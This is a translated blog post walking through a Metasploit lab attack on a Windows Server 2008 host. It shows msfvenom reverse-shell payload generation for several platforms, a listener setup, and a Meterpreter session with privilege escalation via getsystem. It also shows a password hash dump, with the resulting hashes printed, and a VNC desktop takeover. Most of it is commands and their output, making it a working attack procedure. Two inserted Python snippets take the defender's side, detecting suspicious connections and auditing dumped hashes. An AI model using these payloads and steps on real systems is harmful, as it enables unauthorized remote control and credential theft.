1 Environment setup
Windows Server 2008 R2 Datacenter: 192.168.5.128
Kali Linux: 192.168.5.136
2 Generating the malicious payload on Kali with an MSF payload
Generate the payload file 1.exe.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.136 lport=3333 -f exe > 1.exe
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.136 lport=3333 -f exe > 1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

┌──(root㉿kali)-[~]
└─# ls
1.exe
Payload generation for each platform:
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 --platform Linux -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Android:
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R > test.apk
3 Copying the payload to the target host (Windows Server 2008)
Copy the payload file 1.exe from the Kali machine to the target host.
4 Listening on Kali
Start the listener on the Kali machine with the command below. The jobs command lists all current jobs. Note that the IP address, port and payload must match the ones used when generating the payload.
handler -H 192.168.5.136 -P 3333 -p windows/meterpreter/reverse_tcp
msf6 > handler -H 192.168.5.136 -P 3333 -p windows/meterpreter/reverse_tcp
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.5.136:3333
msf6 > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://192.168.5.136:3333

msf6 >
5 The target host (Windows Server 2008) simulates infection by running the payload
Double-click 1.exe to run it.
6 Kali obtains control of the target host
Once the target host has run the payload, Kali shows that a session has been obtained.
msf6 > [*] Sending stage (175686 bytes) to 192.168.5.128
[*] Meterpreter session 1 opened (192.168.5.136:3333 -> 192.168.5.128:49164) at 2022-12-23 02:40:42 -0500
On the target host, running netstat -ant at the command prompt shows that the connection has been established.
Use sessions -l to list the current sessions and sessions -i 1 to enter session 1. Run the shell command to get an interactive command prompt, then use ipconfig to view the IP address.
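From the defender's side, the netstat check above is where this session becomes visible on the host. The following is an added example, not code from the original post: it parses the output of netstat -ano (the -o variant adds the owning PID, which -ant does not) and flags ESTABLISHED outbound TCP connections to remote ports outside a small allow-list, which is how a reverse_tcp session to port 3333 shows up. The sample output and the allow-list are constructed assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on Windows Server 2008 R2 "netstat -ano" output;
# the 192.168.5.x addresses are the lab hosts from the post.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       708
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.5.128:49164    192.168.5.136:3333     ESTABLISHED     2288
  TCP    192.168.5.128:49170    192.168.5.2:443        ESTABLISHED     1840
  TCP    192.168.5.128:139      0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:123            *:*                                    1012
"""

# Remote ports treated as ordinary for outbound traffic (assumption: a tiny
# lab allow-list; a real baseline comes from the host's own traffic profile).
COMMON_REMOTE_PORTS = {53, 80, 88, 135, 139, 389, 443, 445, 636, 3268, 3389}

LINE_RE = re.compile(
    r"^\s*TCP\s+(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<raddr>\S+):(?P<rport>\d+)"
    r"\s+(?P<state>\S+)(?:\s+(?P<pid>\d+))?\s*$"
)


def parse_netstat(text: str) -> List[Dict[str, Optional[object]]]:
    """Return one dict per TCP line; header, blank and UDP lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["lport"] = int(d["lport"])
        d["rport"] = int(d["rport"])
        d["pid"] = int(d["pid"]) if d["pid"] else None
        rows.append(d)
    return rows


def suspicious_outbound(text: str) -> List[Dict[str, Optional[object]]]:
    """ESTABLISHED connections whose remote port is not on the allow-list."""
    return [r for r in parse_netstat(text)
            if r["state"] == "ESTABLISHED" and r["rport"] not in COMMON_REMOTE_PORTS]


if __name__ == "__main__":
    for r in suspicious_outbound(SAMPLE_NETSTAT):
        print(f"PID {r['pid']}: {r['laddr']}:{r['lport']} -> {r['raddr']}:{r['rport']}")
```

The flagged PID (2288 here, matching the cmd.exe that the shell command spawned in the post) is the process to inspect next, for example with tasklist or Process Explorer.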
sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                        Connection
  --  ----  ----                     -----------                                        ----------
  1         meterpreter x86/windows  WIN-75NA0949GFB\Administrator @ WIN-75NA0949GFB  192.168.5.136:3333 -> 192.168.5.128:49164 (192.168.5.128)

msf6 > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2288 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator\Desktop>ipconfig
ipconfig

Windows IP 配置


以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::4cee:7eba:c431:6e0c%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.5.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.5.2

隧道适配器 isatap.localdomain:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : localdomain

C:\Users\Administrator\Desktop>
Obtaining the password hashes
meterpreter > getuid
Server username: WIN-75NA0949GFB\Administrator
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: WIN-75NA0949GFB\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run post/windwos/gather/hashdump
[-] The specified meterpreter session script could not be found: post/windwos/gather/hashdump
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY b6af79f562638c8765e545393476a140...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Administrator:"5▒S▒:S"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:594664d649204bb5c644c47d721bebfc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter >
run vnc to obtain the desktop
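Read as an audit result rather than as loot, the pwdump-format lines above tell a defender two things about the host's password hygiene: whether any account has an empty password (its NT hash is the well-known hash of the empty string, as Guest shows here) and whether the machine still stores LM hashes (the aad3b... value means none is stored). The following is an added example, not part of the original post, that triages such lines; the sample dump is constructed, and the third line is a made-up account with a fabricated LM hash to exercise that case.

```python
from typing import Dict, List

# Well-known values: LM hash "not stored" marker and NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the post's format (user:rid:lm:nt:::). The first two
# lines mirror the lab output; "legacyuser" and its hashes are fabricated.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:594664d649204bb5c644c47d721bebfc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""


def parse_pwdump(text: str) -> List[Dict[str, str]]:
    """Parse user:rid:lm:nt::: lines; anything with fewer fields is skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # blank lines, password-hint lines, other noise
        rows.append({"user": parts[0], "rid": parts[1],
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def audit(text: str) -> Dict[str, List[str]]:
    """Group account names by finding."""
    findings: Dict[str, List[str]] = {"blank_password": [], "lm_hash_stored": []}
    for r in parse_pwdump(text):
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(r["user"])
    return findings


if __name__ == "__main__":
    for finding, users in audit(SAMPLE_DUMP).items():
        print(f"{finding}: {', '.join(users) or '-'}")
```

A blank NT hash on Guest is expected when the account is disabled (hashdump does not show enablement), so confirm the account state before raising it; an LM hash finding maps to the "Do not store LAN Manager hash value on next password change" policy followed by a password reset.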
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.5.136 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\ADMINI~1\AppData\Local\Temp\1\MNsCzZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.5.136:4545...
meterpreter > [*] VNC Server session 2 opened (192.168.5.136:4545 -> 192.168.5.128:49165) at 2022-12-23 03:09:11 -0500
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "win-75na0949gfb"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Use exit to quit the session.
Backgrounding the session: background
meterpreter > background
[*] Backgrounding session 1...
msf6 > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-75NA0949GFB  192.168.5.136:3333 -> 192.168.5.128:49164 (192.168.5.128)

msf6 >
Source: https://www.cnblogs.com/snow2021/p/17000953.html